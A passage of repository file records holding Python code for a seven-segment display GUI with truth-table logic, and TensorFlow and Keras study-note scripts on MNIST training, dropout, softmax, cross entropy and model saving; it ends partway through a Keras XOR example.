self.canvas_width,\n (y - end) * self.canvas_height, (x + end) * self.canvas_width,\n (y - end) * self.canvas_height]\n self.canvas.create_polygon(points, fill=\"orange red\", width=0)\n\n\n# ============================== End Of SevenSegmentGUI Class ==============================\n\n# ====================================== Main Program ======================================\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5578747391700745, "alphanum_fraction": 0.7115749716758728, "avg_line_length": 19.269229888916016, "blob_id": "5f81a19d03b9a3b374b6ac5141697a6e9d17ec37", "content_id": "c42c55ac84e08c03f09ebbf93520ad9035ffabd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 533, "license_type": "no_license", "max_line_length": 121, "num_lines": 26, "path": "/README.md", "repo_name": "jsmlau/seven-segment-display-gui", "src_encoding": "UTF-8", "text": "## Welcome 👋\n> Seven Segment Display GUI\n\n## Prerequisite\nYou may need to install **tkinter**</br>\n\n```sh\nsudo apt-get install python3-tk\n```\n\n## Usage\n\n```sh\npython3 seven_segment_display_gui.py\n```\n## Result\n![segs_gui_01](https://user-images.githubusercontent.com/37385743/89004583-5c715200-d2b7-11ea-9ba9-686b57138e5b.png)</br>\n![segs_gui_02](https://user-images.githubusercontent.com/37385743/89004590-5f6c4280-d2b7-11ea-81a3-0a2c00f951a9.png)\n\n## Author\n\n👤 **Jas Lau**\n\n* Github: [@jsmlau](https://github.com/jsmlau)\n\n***\n" }, { "alpha_fraction": 0.5133110880851746, "alphanum_fraction": 0.524501383304596, "avg_line_length": 34.51602554321289, "blob_id": "1bd3804935dd3329ee472cec58cc6240aa6c3159", "content_id": "288f0430c98094ea1824dec59115a847172a16df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11081, "license_type": "no_license", "max_line_length": 82, "num_lines": 312, "path": "/seven_segment_logic.py", "repo_name": "jsmlau/seven-segment-display-gui", "src_encoding": "UTF-8", "text": "import copy\nimport numpy as np\n\n\n# ====================== Client As A Function ======================\ndef main():\n my_7_seg = SevenSegmentLogic()\n my_12_seg = MultiSegmentLogic(12)\n\n print(\"As constructed -------------------\")\n print(my_7_seg)\n\n try:\n my_12_seg.set_num_segs(12) # should work\n my_7_seg.set_num_segs(8) # should \"throw\"\n except ValueError as err:\n print(\"\\nExpected ... \" + str(err) + \"\\n\")\n\n try:\n my_7_seg.eval(1)\n\n except AttributeError as err:\n print(\"\\nNot Expected... \" + str(err) + \"\\n\")\n\n print(\"\\nFrom 0 - 16: \\n\")\n for input_x in range(16):\n print(\"inputX = \", input_x)\n my_7_seg.eval(input_x)\n print(\"\\n| \", end='')\n for k in range(7):\n print(str(my_7_seg.get_val_of_seg(k)) + \" | \", end='')\n print()\n\n\n# ====================== End of Client As A Function ======================\n# ====================== BooleanFunc Class ======================\n\nclass BooleanFunc:\n # Static members and intended constants\n MAX_TABLE_SIZE = 65536 # that's 16 binary inputs\n MIN_TABLE_SIZE = 2 # that's 1 binary input\n MIN_VALUE = 0\n DEFAULT_TABLE_SIZE = 4\n DEFAULT_FUNC = DEFAULT_TABLE_SIZE * [False]\n\n # Initializer (\"constructor\") method -------------------\n def __init__(self, table_size=None, defining_list=None,\n eval_return_if_error=False):\n \"\"\"\n Args:\n table_size:\n defining_list:\n eval_return_if_error:\n \"\"\"\n if not table_size and not defining_list:\n # passed neither list nor size\n table_size = self.DEFAULT_TABLE_SIZE\n defining_list = self.DEFAULT_FUNC\n elif table_size and not defining_list:\n # passed size but no list\n self.valid_table_size(table_size) # raises, no return\n defining_list = table_size * [False]\n elif not table_size:\n # passed list but no size\n self.valid_defining_list(defining_list) # raises, no return\n table_size = len(defining_list)\n else:\n # passed both list and size\n self.valid_defining_list(defining_list)\n if len(defining_list) != table_size:\n raise ValueError(\"Table size does not match list length\"\n \" in constructor.\")\n # sanitize bools (e.g. (1.32, \"hi\", -99)->True, (0.0, \"\", # 0)->False)\n eval_return_if_error = bool(eval_return_if_error)\n defining_list = [bool(item) for item in defining_list]\n\n # assign instance members\n self.eval_return_if_error = eval_return_if_error\n self.state = eval_return_if_error\n self.table_size = table_size\n self.truth_table = np.array(defining_list, dtype=bool)\n\n def set_truth_table_using(self, rarer_value, inputs_that_produce_rarer_val):\n \"\"\"Allow the client to mutate the truth table (without changing the\n size, whose immutability we preserve from our original design). \"\"\"\n if not (self.MIN_VALUE <= len(inputs_that_produce_rarer_val) <=\n self.table_size):\n return False\n # initialize with inputs_that_produce_rarer_val\n if rarer_value is True:\n self.initialize_table(False)\n\n elif rarer_value is False:\n self.initialize_table(True)\n\n # set the rarer value\n for i in range(len(inputs_that_produce_rarer_val)):\n the_num = inputs_that_produce_rarer_val[i]\n if self.valid_input(the_num):\n self.truth_table[the_num] = rarer_value\n return True\n\n # Mutator -------------------------------\n def eval(self, input_val):\n \"\"\"a mutator for the state attribute based on the an input integer\"\"\"\n if not (self.valid_input(input_val)):\n self.state = self.eval_return_if_error\n return\n # else\n self.state = self.truth_table[input_val]\n return self.state\n\n # Accessor -------------------------------\n def get_state(self):\n return self.state\n\n # Stringizer -------------------------------\n def __str__(self):\n ret_str = \"truth_table: \" + str(self.truth_table) + \"\\nsize = \" + str(\n self.table_size) + \"\\nerror return = \" + str(\n self.eval_return_if_error) + \"\\ncurrent state = \" + str(\n self.state) + \"\\n\"\n return ret_str\n\n # Helper\n @classmethod\n def valid_table_size(cls, size):\n if not isinstance(size, int):\n raise TypeError(\"Table size must be an int.\")\n if not (cls.MIN_TABLE_SIZE <= size <= cls.MAX_TABLE_SIZE):\n raise ValueError(\"Bad table size passed to constructor\"\n \" (legal range: {}-{}).\".format(cls.MIN_TABLE_SIZE,\n cls.MAX_TABLE_SIZE))\n # else\n return True\n\n @classmethod\n def valid_defining_list(cls, the_list):\n if not isinstance(the_list, list):\n raise ValueError(\"Bad type in constructor. defining_list must be\"\n \" type list.\")\n if not (cls.MIN_TABLE_SIZE <= len(the_list) <= cls.MAX_TABLE_SIZE):\n raise ValueError(\"Bad list passed to constructor\"\n \" (its length is outside legal range: {}-{\"\n \"}).\".format(cls.MIN_TABLE_SIZE,\n cls.MAX_TABLE_SIZE))\n # else\n return True\n\n def initialize_table(self, initial_val):\n for i in range(self.table_size):\n self.truth_table[i] = initial_val\n\n def valid_input(self, eval_input):\n if not isinstance(eval_input, int):\n return False\n if not (self.MIN_VALUE <= eval_input < self.table_size):\n return False\n return True\n\n\n# ====================== End Of BooleanFunc Class ======================\n\n# ======================= MultiSegmentLogic Class =======================\n\nclass MultiSegmentLogic:\n # Static members and intended constants\n MAX_SEGS = 7\n MIN_SEGS = 0\n DEFAULT_SEGS = 7\n DEFAULT_NUM_SEGS = 0\n\n # Initializer (\"constructor\") method -------------------\n def __init__(self, num_segs=DEFAULT_NUM_SEGS):\n self.segs = []\n if not self.set_num_segs(num_segs):\n self.num_segs = self.DEFAULT_NUM_SEGS\n self.num_segs = num_segs\n self.segs = [BooleanFunc(num_segs) for i in range(num_segs)]\n\n # Mutator -------------------------------\n def set_num_segs(self, num_segs):\n if not self.check_empty_segs(num_segs):\n return False\n # else\n del self.segs\n self.segs = [BooleanFunc(num_segs) for i in range(num_segs)]\n self.num_segs = num_segs\n return True\n\n def set_segment(self, seg_num, func_for_this_seg):\n # deep copy of func_for_this_seg\n if not self.valid_num_segs(seg_num):\n return False\n # else\n self.segs[seg_num] = copy.deepcopy(func_for_this_seg)\n return True\n\n # Accessor -------------------------------\n def get_val_of_seg(self, seg_num):\n if not isinstance(seg_num, int):\n return False\n if not (self.MIN_SEGS <= seg_num < self.MAX_SEGS):\n return False\n return self.segs[seg_num].state\n\n def eval(self, input):\n for i in range(self.num_segs):\n try:\n self.segs[i].eval(input)\n if self.segs[i] is None:\n raise AttributeError\n except AttributeError:\n print(\"Attribute Error\")\n\n @classmethod\n def check_empty_segs(cls, num_segs):\n if num_segs < cls.DEFAULT_NUM_SEGS:\n return False\n return True\n\n # helper\n def valid_num_segs(self, segs_num):\n if not (self.MIN_SEGS <= segs_num < self.num_segs):\n return False\n return True\n\n def __str__(self):\n ret_str = \"segs: \"\n ret_str += str(self.segs[0])\n ret_str += str(self.segs[1])\n ret_str += str(self.segs[2])\n ret_str += str(self.segs[3])\n ret_str += str(self.segs[4])\n ret_str += str(self.segs[5])\n ret_str += str(self.segs[6])\n ret_str += \"\\nnum segs = \" + str(self.num_segs)\n return ret_str\n\n\n# ======================== End Of MultiSegmentLogic Class ========================\n\n# ============================ SevenSegmentLogic Class ===========================\n\nclass SevenSegmentLogic(MultiSegmentLogic):\n # Initializer (\"constructor\") method -------------------\n def __init__(self):\n # call base class\n super(SevenSegmentLogic, self).__init__(7)\n self.load_boolean_func_for_each_segment()\n\n # override to base class method\n def set_num_segs(self, num_segs):\n if num_segs != 7:\n raise ValueError(\"Number of segments is not 7!\")\n # else\n # chain to base class method\n super(SevenSegmentLogic, self).set_num_segs(num_segs)\n\n # helper\n def load_boolean_func_for_each_segment(self):\n # instantiate BooleanFunc of segment_A to segment_G\n segment_a = BooleanFunc(16)\n segment_b = BooleanFunc(16)\n segment_c = BooleanFunc(16)\n segment_d = BooleanFunc(16)\n segment_e = BooleanFunc(16)\n segment_f = BooleanFunc(16)\n segment_g = BooleanFunc(16)\n # set up a flag to determine if the segment rules have been set up\n self.funcs_previously_defined = False\n\n if not self.funcs_previously_defined:\n # rules of segment A-G\n a_func = [1, 4, 11, 13]\n b_func = [5, 6, 11, 12, 14, 15]\n c_func = [2, 12, 14, 15]\n d_func = [1, 4, 7, 9, 10, 15]\n e_func = [1, 3, 4, 5, 7, 9]\n f_func = [1, 2, 3, 7, 13]\n g_func = [0, 1, 7, 12]\n\n # use False as rare_value to set up the truth table.\n segment_a.set_truth_table_using(False, a_func)\n segment_b.set_truth_table_using(False, b_func)\n segment_c.set_truth_table_using(False, c_func)\n segment_d.set_truth_table_using(False, d_func)\n segment_e.set_truth_table_using(False, e_func)\n segment_f.set_truth_table_using(False, f_func)\n segment_g.set_truth_table_using(False, g_func)\n self.funcs_previously_defined = True\n\n self.set_segment(0, segment_a)\n self.set_segment(1, segment_b)\n self.set_segment(2, segment_c)\n self.set_segment(3, segment_d)\n self.set_segment(4, segment_e)\n self.set_segment(5, segment_f)\n self.set_segment(6, segment_g)\n\n def valid_num_segs(self, segs_num):\n if not (self.MIN_SEGS <= segs_num < self.MAX_SEGS):\n return False\n return True\n\n\n# ============================= End Of SevenSegmentLogic Class ===================\n\n# ================================== Main Program ================================\n\nif __name__ == \"__main__\":\n main()\n" } ]
3
ML-ZimingMeng/Study-Notes
https://github.com/ML-ZimingMeng/Study-Notes
642d5bece9c70a6f1465f9ad44745eebe2dd3d99
f8bd3ef76f455d0ae34d87bd9d0cd1397035e873
1844b98c94cf475877d039032a30ed644509a034
refs/heads/master
2020-09-27T23:06:47.959323
2020-03-01T05:26:34
2020-03-01T05:26:34
226,631,539
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 25, "blob_id": "f6262c8cdc5fab535356499a779e481e1063bd70", "content_id": "4d6d2ff78b5d2c74aa490e3ad9097a0732af8a6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 37, "num_lines": 2, "path": "/README.md", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "# Study-Notes\nMy study notes about machine learning\n" }, { "alpha_fraction": 0.7080554366111755, "alphanum_fraction": 0.7249871492385864, "avg_line_length": 31.63793182373047, "blob_id": "565c391290990212d4b2392f445d608cd40e686d", "content_id": "b3117a8ca3a9e62d81efccfbf8ce1ba238479366", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1949, "license_type": "no_license", "max_line_length": 91, "num_lines": 58, "path": "/TensorFlow/Mini-batch/distrubute_to_linear/quiz.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "from tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom helper import batches\r\n\r\nlearning_rate = 0.001\r\nn_input = 784 # MNIST data input (img shape: 28*28)\r\nn_classes = 10 # MNIST total classes (0-9 digits)\r\n\r\n# Import MNIST data\r\nmnist = input_data.read_data_sets('/datasets/ud730/mnist',one_hot=True)\r\n\r\n# The features are already scaled and the data is shuffled\r\ntrain_features = mnist.train.images\r\ntest_features = mnist.test.images\r\n\r\ntrain_labels = mnist.train.labels.astype(np.float32)\r\ntest_labels = mnist.test.labels.astype(np.float32)\r\n\r\n# Features and Labels\r\nfeatures = tf.placeholder(tf.float32,[None,n_input])\r\nlabels = tf.placeholder(tf.float32,[None,n_classes])\r\n\r\n# Weights & bias\r\nweights = tf.Variable(tf.random_normal([n_input,n_classes]))\r\nbias = tf.Variable(tf.random_normal([n_classes]))\r\n\r\n# Logits - xW + b\r\nlogits = tf.add(tf.matmul(features,weights),bias)\r\n\r\n# Define loss and optimizer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=labels))\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n# Calculate accuracy\r\ncorrect_prediction = tf.equal(tf.argmax(logits,1),tf.argmax(labels,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n\r\n# TODO: Set batch size\r\nbatch_size = 128\r\nassert batch_size is not None,'You must set the batch size'\r\n\r\ninit = tf.global_variables_initializer()\r\n\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n\r\n # TODO: Train optimizer on all batches\r\n for batch_features,batch_labels in batches(batch_size,train_features,train_labels):\r\n sess.run(optimizer,feed_dict={features:batch_features,labels:batch_labels})\r\n\r\n # Calculate accuracy for test dataset\r\n test_accuracy = sess.run(\r\n accuracy,\r\n feed_dict={features:test_features,labels:test_labels}\r\n )\r\n\r\nprint('Test Accuracy:{}'.format(test_accuracy))" }, { "alpha_fraction": 0.5205327272415161, "alphanum_fraction": 0.6026636958122253, "avg_line_length": 22.405405044555664, "blob_id": "e899ee9a35b275b664b5eee078e40c9bb6cb9391", "content_id": "291f366b35f82fbf6a43dc4b414d59c1e8c9ea44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 923, "license_type": "no_license", "max_line_length": 83, "num_lines": 37, "path": "/TensorFlow/tf_Dropout.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\nhidden_layer_weights = [\r\n [0.1,0.2,0.4],\r\n [0.4,0.6,0.6],\r\n [0.5,0.9,0.1],\r\n [0.8,0.2,0.8]]\r\nout_weights = [\r\n [0.1,0.6],\r\n [0.2,0.1],\r\n [0.7,0.9]]\r\n\r\nweights = [\r\n tf.Variable(hidden_layer_weights),\r\n tf.Variable(out_weights)\r\n]\r\nbiases = [\r\n tf.Variable(tf.zeros(3)),\r\n tf.Variable(tf.zeros(2))\r\n]\r\n\r\n# Input\r\nfeatures = tf.Variable([[0.0,2.0,3.0,4.0],[0.1,0.2,0.3,0.4],[11.0,12.0,13.0,14.0]])\r\n\r\n# Create Model with Dropout\r\nkeep_prob = tf.placeholder(tf.float32)\r\nlayer = tf.add(tf.matmul(features,weights[0]),biases[0])\r\nlayer = tf.nn.relu(layer)\r\nlayer = tf.nn.dropout(layer,keep_prob)\r\n\r\nlogits = tf.add(tf.matmul(layer,weights[1]),biases[1])\r\n\r\n# Print logtis from a session\r\n# 初始化\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n print(sess.run(logits,feed_dict={keep_prob:0.5}))# 在此设置keep_prob参数也行" }, { "alpha_fraction": 0.624790608882904, "alphanum_fraction": 0.6264656782150269, "avg_line_length": 27.850000381469727, "blob_id": "c714be301d8f23b4e87e7307719c97d9d5f2fc63", "content_id": "64648bdc2ddcc67c97052662e713f6edf9b85c68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 67, "num_lines": 20, "path": "/TensorFlow/Mini-batch/sandbox/quiz_sandbox.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import math\r\ndef batches(batch_size,features,labels):\r\n \"\"\"\r\n Create batches of features and labels\r\n :param batch_size: The batch size\r\n :param features: List of features\r\n :param babels: List of labels\r\n :return: Batches of (Features,Labels)\r\n \"\"\"\r\n assert len(features) == len(labels)\r\n\r\n # implement batching\r\n output_batches = []\r\n\r\n for start_i in range(0,len(features),batch_size):\r\n end_i = start_i + batch_size\r\n batch = [[features[start_i:end_i]],[labels[start_i:end_i]]]\r\n output_batches.append(batch)\r\n\r\n return output_batches\r\n" }, { "alpha_fraction": 0.6508108377456665, "alphanum_fraction": 0.6518918871879578, "avg_line_length": 26.090909957885742, "blob_id": "6636263e3fc99a557acfa5291d8d6123d40caec2", "content_id": "17d92d2e45213ea551fcf7cd19e855b120cf7af4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1063, "license_type": "no_license", "max_line_length": 66, "num_lines": 33, "path": "/TensorFlow/Linear algebra/quiz.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\ndef get_weights(n_features,n_labels):\r\n \"\"\"\r\n Return Tensorflow weights\r\n :param n_features: Number of features\r\n :param n_labels: Number of labels\r\n :return: Tensorflow weights\r\n \"\"\"\r\n # Return weights\r\n # 使用tf.Variable()返回可修改的权重,采用随机化,\r\n # 因此用正态分布tf.truncated_normal()\r\n return tf.Variable(tf.truncated_normal((n_features,n_labels)))\r\n\r\ndef get_biases(n_labels):\r\n \"\"\"\r\n Return Tensorflow bias\r\n :param n_labels: Number of labels\r\n :return: Tensorflow bias\r\n \"\"\"\r\n # 因为权重已经被随机化来帮助模型不被卡住,因此不需要再随机化偏差了,设为0.\r\n return tf.Variable(tf.zeros(n_labels))\r\n\r\ndef linear(input,w,b):\r\n \"\"\"\r\n Return linear function in Tensorflow\r\n :param input: Tensorflow input\r\n :param w: Tensorflow weights\r\n :param b: Tensorflow biases\r\n :return: TensorFlow linear function\r\n \"\"\"\r\n # 使用tf.matmul()函数进行矩阵乘法\r\n return tf.add(tf.matmul(input,w),b)" }, { "alpha_fraction": 0.4851228892803192, "alphanum_fraction": 0.5756791830062866, "avg_line_length": 20.735294342041016, "blob_id": "d837ce942d7c1230dc5d228598d6a6dd26d02554", "content_id": "c9d9d829138e0eeeddac77279c5270d90c114a92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 779, "license_type": "no_license", "max_line_length": 87, "num_lines": 34, "path": "/TensorFlow/tf_relu.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\noutput = None\r\nhidden_layer_weight = [\r\n [0.1,0.2,0.4],\r\n [0.4,0.6,0.6],\r\n [0.5,0.9,0.1],\r\n [0.8,0.2,0.8]]\r\nout_weights = [\r\n [0.1,0.6],\r\n [0.2,0.1],\r\n [0.7,0.9]]\r\n\r\nweights = [\r\n tf.Variable(hidden_layer_weight),\r\n tf.Variable(out_weights)\r\n]\r\nbiases = [\r\n tf.Variable(tf.zeros(3)),\r\n tf.Variable(tf.zeros(2))\r\n]\r\n\r\n# Input\r\nfeatures = tf.Variable([[1.0,2.0,3.0,4.0],[-1.0,-2.0,-3.0,-4.0],[11.0,12.0,13.0,14.0]])\r\n\r\n# Create Model\r\nhidden_layer = tf.nn.relu(tf.add(tf.matmul(features,weights[0]),biases[0]))\r\nlogits = tf.add(tf.matmul(hidden_layer,weights[1]),biases[1])\r\n\r\n# Print session results\r\n# 初始化\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n print(sess.run(logits))\r\n" }, { "alpha_fraction": 0.5971014499664307, "alphanum_fraction": 0.6202898621559143, "avg_line_length": 21.133333206176758, "blob_id": "7d35e73f24962c83d28537847aa724449e914c28", "content_id": "7d37a4ae016ef04c85f693b208d4432709bb1e51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 65, "num_lines": 15, "path": "/TensorFlow/tf_softmax.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\ndef run():\r\n output = None\r\n logits_data = [2.0,1.0,0.1]\r\n logits = tf.placeholder(tf.float32) # 使用非常量\r\n\r\n # Calculate the softamx of the logits\r\n\r\n softmax = tf.nn.softmax(logits)\r\n\r\n with tf.Session() as sess:\r\n output = sess.run(softmax,feed_dict={logits:logits_data})\r\n\r\n return output" }, { "alpha_fraction": 0.6447920799255371, "alphanum_fraction": 0.66806560754776, "avg_line_length": 30.787500381469727, "blob_id": "56e51c9923cef0ea5edbf042daf79738880b1769", "content_id": "518ab0eda4702f1741bc2bf5b44c4881b87a6e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3039, "license_type": "no_license", "max_line_length": 103, "num_lines": 80, "path": "/TensorFlow/multilayer_perceptron.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "from tensorflow.examples.tutorials.mnist import input_data\r\n# 使用Tensorflow提供的MNIST数据集\r\nmnist = input_data.read_data_sets(\".\",one_hot=True,reshape=False)\r\n\r\nimport tensorflow as tf\r\n\r\n# 参数Parameters,可进行调整以改善模型\r\nlearning_rate = 0.001\r\ntraining_epochs = 20\r\nbatch_size = 128 # 如果没有足够内存,可适当降低\r\ndisplay_step = 1\r\n\r\nn_input = 784 # MNIST data input (img shape: 28*28)\r\nn_classes = 10 # MNIST total classes (0-9 digits)\r\n\r\n# 隐藏层参数Hidden Layer Parameters\r\n# n_hidden_layer 决定了神经网络隐藏层的带下。也被称作层的宽度。\r\nn_hidden_layer = 256 # 特征的层数\r\n\r\n# 权重和偏置项 Weights and Biases\r\n# 层权重和偏置项的储存\r\nweights = {\r\n 'hidden_layer':tf.Variable(tf.random_normal([n_input,n_hidden_layer])),\r\n 'out':tf.Variable(tf.random_normal([n_hidden_layer,n_classes]))\r\n}\r\nbiases = {\r\n 'hidden_layer':tf.Variable(tf.random_normal([n_hidden_layer])),\r\n 'out':tf.Variable(tf.random_normal([n_classes]))\r\n}\r\n\r\n# 输入Input\r\nx = tf.placeholder(\"float\",[None,28,28,1])\r\ny = tf.placeholder(\"float\",[None,n_classes])\r\n\r\nx_flat = tf.reshape(x,[-1,n_input]) # 将29px*28px的矩阵转换成784px*1px的单行向量\r\n\r\n# 建立多层感知器Multilayer Perceptron\r\n# ReLU作为隐藏层激活函数\r\nlayer_1 = tf.add(tf.matmul(x_flat,weights['hidden_layer']),biases['hidden_layer'])\r\nlayer_1 = tf.nn.relu(layer_1)\r\n\r\n# 输出层的线性激活函数\r\nlogits = tf.add(tf.matmul(layer_1,weights['out']),biases['out'])\r\n\r\n# 定义误差值cost和优化器Optimizer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=y))\r\n# 这里采用了与Intro to Tensorflow lab相同的优化技术\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n## Session\r\n# 初始化变量\r\ninit = tf.global_variables_initializer()\r\n\r\n# 启动图\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n # 训练循环\r\n for epoch in range(training_epochs):\r\n total_batch = int(mnist.train.num_examples/batch_size)\r\n # 遍历所有batch\r\n for i in range(total_batch):\r\n batch_x,batch_y = mnist.train.next_batch(batch_size)\r\n # 运行优化器进行反向传播,计算cost(获取loss值)\r\n sess.run(optimizer,feed_dict={x:batch_x,y:batch_y})\r\n # 显示每步的logs\r\n if epoch % display_step == 0:\r\n c = sess.run(cost,feed_dict={x:batch_x,y:batch_y})\r\n print(\"Epoch:\",'%04d' % (epoch + 1),\"cost=\",\"{:.9f}\".format(c))\r\n print(\"Optimization Finished!\")\r\n\r\n # 测试模型\r\n correct_prediction = tf.equal(tf.argmax(logits,1),tf.argmax(y,1))\r\n # 计算准确率\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction,\"float\"))\r\n # 如果没有足够的内存可以适当减少test_size\r\n test_size = 256\r\n print(\"Accuracy:\",accuracy.eval({x:mnist.test.images[:test_size],y:mnist.test.labels[:test_size]}))\r\n\r\n# Optimization Finished!\r\n# Accuracy: 0.78515625" }, { "alpha_fraction": 0.7138643264770508, "alphanum_fraction": 0.7404129505157471, "avg_line_length": 32, "blob_id": "bcec6c86bca4928fae9c1357d6f4a59c9e751f35", "content_id": "ce048b3004f2abf90205290fb47e248dafc451fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 678, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/TensorFlow/Mini-batch/w_b_MNIST.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "from tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\nn_input = 784 # MNIST data input(img shape:28*28)\r\nn_classes = 10 # MNIST total classes (0-9 digits)\r\n\r\n# Import MNIST data\r\nmnist = input_data.read_data_sets('/datasets/ud730/mnist',one_hot=True)\r\n\r\n# The features are already scaled and the data is shuffled\r\ntrain_features = mnist.train.images\r\ntest_features = mnist.test.images\r\n\r\ntrain_labels = mnist.train.labels.astype(np.float32)\r\ntest_labels = mnist.test.labels.astype(np.float32)\r\n\r\n# Weights & bias\r\nweights = tf.Variable(tf.random_normal([n_input,n_classes]))\r\nbias = tf.Variable(tf.random_normal([n_classes]))" }, { "alpha_fraction": 0.6750503182411194, "alphanum_fraction": 0.6851106882095337, "avg_line_length": 22.899999618530273, "blob_id": "cf1854b9bc3beceb3559c35c74efd49ca12a01a6", "content_id": "67b7b7980fca1568d3f04888edd260c9ab78e20e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1206, "license_type": "no_license", "max_line_length": 80, "num_lines": 40, "path": "/TensorFlow/tf_modify_model.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\n# 移除先前的权重和偏置项\r\ntf.reset_default_graph()\r\n\r\nsave_file = './train_model.ckpt'\r\n\r\n# 两个Tensor变量:权重和偏置项\r\n# 把保存的变量直接加载到已经修改过的模型会产生错误\r\nweights = tf.Variable(tf.truncated_normal([2,3]),name='weights_0') # 手动设置name属性\r\nbias = tf.Variable(tf.truncated_normal([3]),name='bias_0')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# 打印权重和偏置项的名字\r\nprint('Save Weights:{}'.format(weights.name))\r\nprint('Save Bias:{}'.format(bias.name))\r\n\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n saver.save(sess,save_file)\r\n\r\n# 移除之前的权重和偏置项\r\ntf.reset_default_graph()\r\n\r\n# 两个变量:权重和偏置项\r\nbias = tf.Variable(tf.truncated_normal([3]),name='bias_0')\r\nweights = tf.Variable(tf.truncated_normal([2,3]),name='weights_0')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# 打印权重和偏置项的名字\r\nprint('Load Weights:{}'.format(weights.name))\r\nprint('Load Bias:{}'.format(bias.name))\r\n\r\nwith tf.Session() as sess:\r\n # 加载权重和偏置项-报错\r\n saver.restore(sess,save_file)\r\n\r\nprint('Loaded Weights and Bias successfully.')" }, { "alpha_fraction": 0.6607595086097717, "alphanum_fraction": 0.701265811920166, "avg_line_length": 28.538461685180664, "blob_id": "7a6b1519825b9c195d4c21abdd3f6c8385fab527", "content_id": "a025ae625711194ce0fc34f24f435385ad0d69de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 88, "num_lines": 13, "path": "/TensorFlow/tf_Cross Entropy.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\nsoftmax_data = [0.7,0.2,0.1]\r\none_hot_data = [1.0,0.0,0.0]\r\n\r\nsoftmax = tf.placeholder(tf.float32)\r\none_hot = tf.placeholder(tf.float32)\r\n\r\n# Print cross entropy(交叉熵)from session\r\ncross_entropy = -tf.reduce_sum(tf.multiply(one_hot,tf.log(softmax)))\r\n\r\nwith tf.Session() as sess:\r\n print(sess.run(cross_entropy,feed_dict={softmax:softmax_data,one_hot:one_hot_data}))" }, { "alpha_fraction": 0.6495277881622314, "alphanum_fraction": 0.6820566654205322, "avg_line_length": 21.875, "blob_id": "5738ef65cd80804f441b995e905d55cbb8a07dd1", "content_id": "d9a62e5ee33953e56ab39a8abd9aa890a5464003", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 979, "license_type": "no_license", "max_line_length": 77, "num_lines": 40, "path": "/Keras/network.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom keras.utils import np_utils\r\nimport tensorflow as tf\r\ntf.python_io = tf\r\n\r\n# Set random seed\r\nnp.random.seed(42)\r\n\r\n# Our data\r\nX = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')\r\ny = np.array([[0],[1],[1],[0]]).astype('float32')\r\n\r\n# Initial Setup for Keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense,Activation\r\n# One-hot encoding the output\r\ny = np_utils.to_categorical(y)\r\n\r\n# Building the model\r\nxor = Sequential()\r\n\r\n# Add required 